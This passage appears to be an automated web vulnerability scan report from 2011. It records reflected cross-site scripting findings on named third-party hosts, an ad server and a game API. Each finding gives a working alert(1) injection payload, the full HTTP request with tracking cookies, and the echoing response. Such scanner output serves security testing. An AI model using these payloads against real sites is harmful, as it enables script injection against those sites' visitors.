The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 239ba<img%20src%3da%20onerror%3dalert(1)>b848b762356 was submitted in the REST URL parameter 8. This input was echoed as 239ba<img src=a onerror=alert(1)>b848b762356 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E239ba<img%20src%3da%20onerror%3dalert(1)>b848b762356?verbosity=9&non_secure=1&method=POST&callback=jQuery16204978716284967959_1315849731750&$amount=1&_=1315849743849 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:51:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 6912
Connection: keep-alive

jQuery16204978716284967959_1315849731750({
"content": [
{
"transaction_group_id": "e4585ae6dd3d11e09e70a1d588d6b83a",
"end_user": {
"read_only": 0,

...[SNIP]...
"end_user_title": "Checkin-SavannahNow"
}
],
"created_timestamp": 1315831871,
"end_user_login": "1B3C6937-8DDC-4B7E-95C5-7878A957141E239ba<img src=a onerror=alert(1)>b848b762356",
"level_summaries": [
{
"end_user_description": "You've earned Savannah Bucks just for visiting this page! Log in to keep your Bucks and re
...[SNIP]...

2.22. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 448ee<script>alert(1)</script>ac7a6816012 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&non_secure=1&method=POST&callback=jQuery16204978716284967959_1315849731750448ee<script>alert(1)</script>ac7a6816012&$amount=1&_=1315849743849 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:49 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 457
Connection: keep-alive

jQuery16204978716284967959_1315849731750448ee<script>alert(1)</script>ac7a6816012({
"content": "3",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"BDM-Reason-Phrase":
...[SNIP]...

2.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e412'%3balert(1)//85a26cf6ed2 was submitted in the $ parameter. This input was echoed as 8e412';alert(1)//85a26cf6ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=8e412'%3balert(1)//85a26cf6ed2&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 631
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8e412';alert(1)//85a26cf6ed2,746f2';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='8e412';alert(1)//85a26cf6ed2,746f2'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=8e412';alert(1)//85a26cf6ed2,746f2';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

2.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb91"%3balert(1)//bc21aa44290 was submitted in the $ parameter. This input was echoed as feb91";alert(1)//bc21aa44290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=feb91"%3balert(1)//bc21aa44290&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:feb91";alert(1)//bc21aa44290,c46b4";expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236:305,232825,235949|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24:0,14#0,120:0,10#0,24;expires=Wed, 12 Oct 2011 12:48:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Content-Length: 6383
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='feb91";alert(1)//bc21aa44290,c46b4"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=feb91";alert(1)//bc21aa44290,c46b4";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;

...[SNIP]...

2.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290ab'%3balert(1)//ed469f36d1b was submitted in the q parameter. This input was echoed as 290ab';alert(1)//ed469f36d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=290ab'%3balert(1)//ed469f36d1b&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:4:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:40 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='290ab';alert(1)//ed469f36d1b,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=290ab';alert(1)//ed469f36d1b,1a0a560b5ac81252e91
...[SNIP]...

2.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7baf9"%3balert(1)//41b4507dc6c was submitted in the q parameter. This input was echoed as 7baf9";alert(1)//41b4507dc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=7baf9"%3balert(1)//41b4507dc6c&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:4:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:40 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='7baf9";alert(1)//41b4507dc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=7baf9";alert(1)//41b4507dc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;



...[SNIP]...

2.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f500"%3balert(1)//a377cf4d1f4 was submitted in the $ parameter. This input was echoed as 8f500";alert(1)//a377cf4d1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=8f500"%3balert(1)//a377cf4d1f4&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8f500";alert(1)//a377cf4d1f4,21990";expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='8f500";alert(1)//a377cf4d1f4,21990"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=8f500";alert(1)//a377cf4d1f4,21990";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;

2.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 349bc'%3balert(1)//f49a54755fd was submitted in the $ parameter. This input was echoed as 349bc';alert(1)//f49a54755fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=349bc'%3balert(1)//f49a54755fd&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:349bc';alert(1)//f49a54755fd,e304a';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='349bc';alert(1)//f49a54755fd,e304a'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=349bc';alert(1)//f49a54755fd,e304a';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

2.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9b1f'%3balert(1)//4f2061d893a was submitted in the q parameter. This input was echoed as b9b1f';alert(1)//4f2061d893a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=b9b1f'%3balert(1)//4f2061d893a&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
